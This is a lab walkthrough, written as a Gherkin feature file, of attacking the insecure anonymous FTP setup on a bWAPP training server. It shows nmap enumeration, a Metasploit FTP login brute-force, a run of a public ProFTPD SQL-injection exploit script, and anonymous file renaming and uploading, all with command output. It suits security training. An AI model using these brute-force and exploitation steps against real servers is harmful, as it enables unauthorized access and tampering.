# language: en

Feature: Insecure FTP Configuration
  From system bWAPP
  From the A5 - Security Misconfiguration
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am running Burp Suite Community edition v1.7.30
  And I am running nmap 7.40v
  And I am running Metasploit 5.0.0-dev-888dc43
  And I am using ftp command
  Given the following in the url
  """
  URL: http://localhost/bWAPP/sm_ftp.php
  Message: Insecure FTP Configuration
  Details:
      - The FTP server has an insecure configuration!
  Objective: Find out why it's insecure
  """

Scenario: Insecure FTP Exploitation
According to the RFC https://tools.ietf.org/html/rfc1635,
anonymous access is restricted to certain commands, such
as: logging, listing content of limitied directories,
and retrieve files.
  Given server, I first do an enumeration
  """
  # Nmap output
  skorn@Morgul ~/D/tools> sudo nmap -sV 192.168.75.128
  [sudo] password for skorn:
  Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-31 20:35 -05
  Nmap scan report for 192.168.75.128
  Host is up (0.00056s latency).
  Not shown: 983 closed ports
  PORT     STATE SERVICE     VERSION
  21/tcp   open  ftp         ProFTPD 1.3.1

  # ftp service active
  # Specifically ProFTPD 1.3.1
  """
  Then I try to exploit it by using known vulnerabilities
  And increasing the attack vector
  Then I use metasploit to bruteforce login
  """
  # Metasploit output
  msf5 auxiliary(scanner/ftp/ftp_login) > run

  [*] 192.168.75.128:21     - 192.168.75.128:21 - Starting FTP login sweep
  [-] 192.168.75.128:21     - 192.168.75.128:21 - LOGIN FAILED:
  :admin (Incorrect: )
  [-] 192.168.75.128:21     - 192.168.75.128:21 - LOGIN FAILED:
  :123456 (Incorrect: )
  [-] 192.168.75.128:21     - 192.168.75.128:21 - LOGIN FAILED:
  :12345 (Incorrect: )
  [-] 192.168.75.128:21     - 192.168.75.128:21 - LOGIN FAILED:
  :123456789 (Incorrect: )
  [-] 192.168.75.128:21     - 192.168.75.128:21 - LOGIN FAILED:
  :password (Incorrect: )
  [-] 192.168.75.128:21     - 192.168.75.128:21 - LOGIN FAILED:
  :iloveyou (Incorrect: )

  # It tries more combinations, but none matches.
  """
  Then I look on searchsploit if there is any exploit
  """
  # searchsploit output
  skorn@Morgul ~/D/tools> searchsploit proftp
  -----------------------------------------------
  ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection
  """
  Then I get the file of the PoC for that exploit
  And I use it against the target
  """
  # 32798.pl -> ProFTPD 1.3- SQL Injection
  skorn@Morgul ~/D/s/pentest-testing> perl ./sqlinjection-ftp.pl 192.168.75.128
  ----------------------------------------------------------
  [+] ProFTPd with mod_mysql Authentication Bypass Exploit
  [+] Credits Go For gat3way For Finding The Bug !
  [+] Exploited By AlpHaNiX
  [+] NullArea.Net
  ----------------------------------------------------------

  [!] Couldn't ByPass The authentication ! Login incorrect.
  [!] Attacking 192.168.75.128 ...⏎
  """
  And sadly didn't work
  Then I try using the standard way
  And I login using anonymous access
  """
  # ftp output
  skorn@Morgul ~/D/t/O-Saft-18.07.18-trve> ftp 192.168.75.128 21
  Connected to 192.168.75.128.
  220 ProFTPD 1.3.1 Server (bee-box) [192.168.75.128]
  Name (192.168.75.128:skorn): anonymous
  331 Anonymous login ok, send your complete email address as your password
  Password:
  230 Anonymous access granted, restrictions apply
  Remote system type is UNIX.
  Using binary mode to transfer files.

  # Without any problem, could login, that's normal for this user.
  """
  Then I try several commands that should be allowed to anonymous user
  """
  # ftp commands not allowed for anonymous user, used:
  # rename, put
  """
  Then I frist try to list directory
  """
  # ftp listing dir
  ftp> dir
  200 PORT command successful
  150 Opening ASCII mode data connection for file list
  -rw-rw-r--   1 root     www-data   543803 Nov  2  2014 Iron_Man.pdf
  -rw-rw-r--   1 root     www-data   462949 Nov  2  2014
  Terminator_Salvation.pdf
  -rw-rw-r--   1 root     www-data   544600 Nov  2  2014
  The_Amazing_Spider-Man.pdf
  -rw-rw-r--   1 root     www-data   526187 Nov  2  2014
  The_Cabin_in_the_Woods.pdf
  -rw-rw-r--   1 root     www-data   756522 Nov  2  2014
  The_Dark_Knight_Rises.pdf
  -rw-rw-r--   1 root     www-data   618117 Nov  2  2014
  The_Incredible_Hulk.pdf
  -rw-rw-r--   1 root     www-data  5010042 Nov  2  2014
  bWAPP_intro.pdf
  226 Transfer complete

  # So far, this is expected
  """
  Then I try to change directory (cd)
  But it does not work
  """
  # ftp cd
  ftp> cd ..
  250 CWD command successful
  ftp> ls
  200 PORT command successful
  150 Opening ASCII mode data connection for file list
  -rw-rw-r--   1 root     www-data   543803 Nov  2  2014 Iron_Maiden.pdf
  ...
  ...
  226 Transfer complete

  # Neither cdup works
  ftp> cdup
  250 CDUP command successful
  ftp> ls
  200 PORT command successful
  150 Opening ASCII mode data connection for file list
  -rw-rw-r--   1 root     www-data   543803 Nov  2  2014 Iron_Maiden.pdf
  ...
  ...
  226 Transfer complete
  """
  Then I try to rename a file
  """
  # ftp renaming
  ftp> rename Iron_Man.pdf Iron_Maiden.pdf
  350 File or directory exists, ready for destination name
  250 Rename successful
  ftp> dir
  200 PORT command successful
  150 Opening ASCII mode data connection for file list
  -rw-rw-r--   1 root     www-data   543803 Nov  2  2014 Iron_Maiden.pdf

  # Not expected, as it shouldn't be allowed.
  """
  Then I try to upload a local file
  """
  # Creating local file
  skorn@Morgul ~/D/tools> touch trve-exploit.sh

  # Uploading it
  ftp> put trve-exploit.sh
  local: trve-exploit.sh remote: trve-exploit.sh
  200 PORT command successful
  150 Opening BINARY mode data connection for trve-exploit.sh
  226 Transfer complete
  ftp>

  # Cheking it uploaded
  ftp> ls trve-exploit.sh
  200 PORT command successful
  150 Opening ASCII mode data connection for file list
  -rw-r--r--   1 ftp      nogroup         0 Aug  1 01:22 trve-exploit.sh
  226 Transfer complete
  """
